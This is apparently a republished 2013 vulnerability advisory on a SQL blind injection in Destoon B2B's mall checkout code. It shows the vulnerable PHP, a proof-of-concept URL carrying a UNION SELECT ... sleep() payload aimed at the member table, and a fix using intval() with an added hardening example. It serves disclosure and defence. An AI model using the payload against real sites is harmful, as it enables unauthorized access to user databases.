Destoon B2B website software, latest version: SQL blind injection vulnerability - Vulnerability warning - the black bar safety net

ID MYHACK58:62201341024
Type myhack58
Reporter hawkish001@乌云
Modified 2013-10-21T00:00:00


Brief description:

The Destoon B2B website software has a SQL injection vulnerability, even with the 20130703 patch applied.

Detailed description:

In the file under /module/mall/, besides the injection point reported by know Chong Yu, which has already been fixed, other injection points are present.

    if($submit) {
        require DT_ROOT.'/module/'.$module.'/cart.class.php';
        $do = new cart();
        $cart = $do->get();
        if($post) {
            $add = array_map('trim', $add);
            $add['address'] = area_pos($add['areaid'], '').$add['address'];
            $add = array_map('htmlspecialchars', $add);
            $buyer_address = $add['address'];
            if(strlen($buyer_address) < 10) message($L['msg_type_address']);
            $buyer_postcode = $add['postcode'];
            if(strlen($buyer_postcode) < 6) message($L['msg_type_postcode']);
            $buyer_name = $add['truename'];
            if(strlen($buyer_name) < 2) message($L['msg_type_truename']);
            $buyer_mobile = $add['mobile'];
            if(strlen($buyer_mobile) < 11) message($L['msg_type_mobile']);
            $buyer_phone = $add['telephone'];
            $buyer_receive = $add['receive'];
            if(strlen($buyer_receive) < 2) message($L['msg_type_express']);
            $i = 0;
            foreach($post as $k=>$v) {
                // each key of $post has the form itemid-s1-s2-s3
                $t1 = explode('-', $k);
                $itemid = $t1[0];
                $s1 = $t1[1];
                $s2 = $t1[2];
                $s3 = $t1[3];
                // injection point: $itemid is user-controlled and is not quoted
                $t = $db->get_one("SELECT * FROM {$table} WHERE itemid=$itemid");
                // (the excerpt ends here)

Here $submit, $post and $add are externally submitted data.

The problem is in the statement $t = $db->get_one("SELECT * FROM {$table} WHERE itemid=$itemid");

$itemid is assigned from a key of the $post array, so it is controlled by user input, and the SQL statement does not wrap $itemid in single quotes. As a result the GPC protection is bypassed and blind injection through a UNION query is possible.

Proof of vulnerability:

Login is required.

http://localhost/webapp/destoon/mall/buy.php?add[address]=abcdefghijklm&add[postcode]=abcdefghijklm&add[truename]=abcdefghijklm&add[mobile]=abcdefghijklm&add[telephone]=abcdefghijklm&add[receive]=abcdefghijklm&post[1 union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,sleep(1 0) from destoon_member]=b

At the same time, submit submit=1 via POST.

I printed out the SQL statement that was executed.


Repair solutions:

Filter the input data; for integer data, use intval().
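
The repair described above, shown beside the vulnerable pattern. This is an added example, not Destoon's code or the reporter's: the function names, the table name example_table and the sample keys are constructed for illustration, and the four-part key format itemid-s1-s2-s3 is assumed from the excerpt.

```php
<?php
// Added example, not Destoon code. All names and sample values are hypothetical.

// Vulnerable pattern from the excerpt: the first key segment is used unquoted.
function build_query_vulnerable(string $table, string $key): string
{
    $t1 = explode('-', $key);
    $itemid = $t1[0];
    return "SELECT * FROM {$table} WHERE itemid=$itemid";
}

// Hardened: every segment of "itemid-s1-s2-s3" must be digits only, then intval().
function parse_cart_key(string $key): ?array
{
    $parts = explode('-', $key);
    if (count($parts) !== 4) {
        return null;
    }
    foreach ($parts as $p) {
        // ctype_digit() rejects '', spaces, signs and any trailing text;
        // the length limit keeps intval() within range on 32-bit builds.
        if (!ctype_digit($p) || strlen($p) > 9) {
            return null;
        }
    }
    return array_map('intval', $parts);
}

function build_query_fixed(string $table, string $key): ?string
{
    $ids = parse_cart_key($key);
    if ($ids === null) {
        return null; // skip the entry instead of running a query
    }
    return "SELECT * FROM {$table} WHERE itemid={$ids[0]}";
}

// Constructed sample keys: one well formed, one with SQL text after the item id.
$samples = ['12-0-1-2', '12 union select 1-0-1-2'];
foreach ($samples as $key) {
    // addslashes() stands in for GPC escaping: the key has no quotes, so it is unchanged.
    $escaped = addslashes($key);
    echo "key:        $key\n";
    echo "escaped:    $escaped\n";
    echo "vulnerable: " . build_query_vulnerable('example_table', $escaped) . "\n";
    echo "fixed:      " . var_export(build_query_fixed('example_table', $escaped), true) . "\n\n";
}
```

Rejecting a malformed key outright, rather than only casting it, also keeps an entry such as "12 union ..." from silently resolving to item 12.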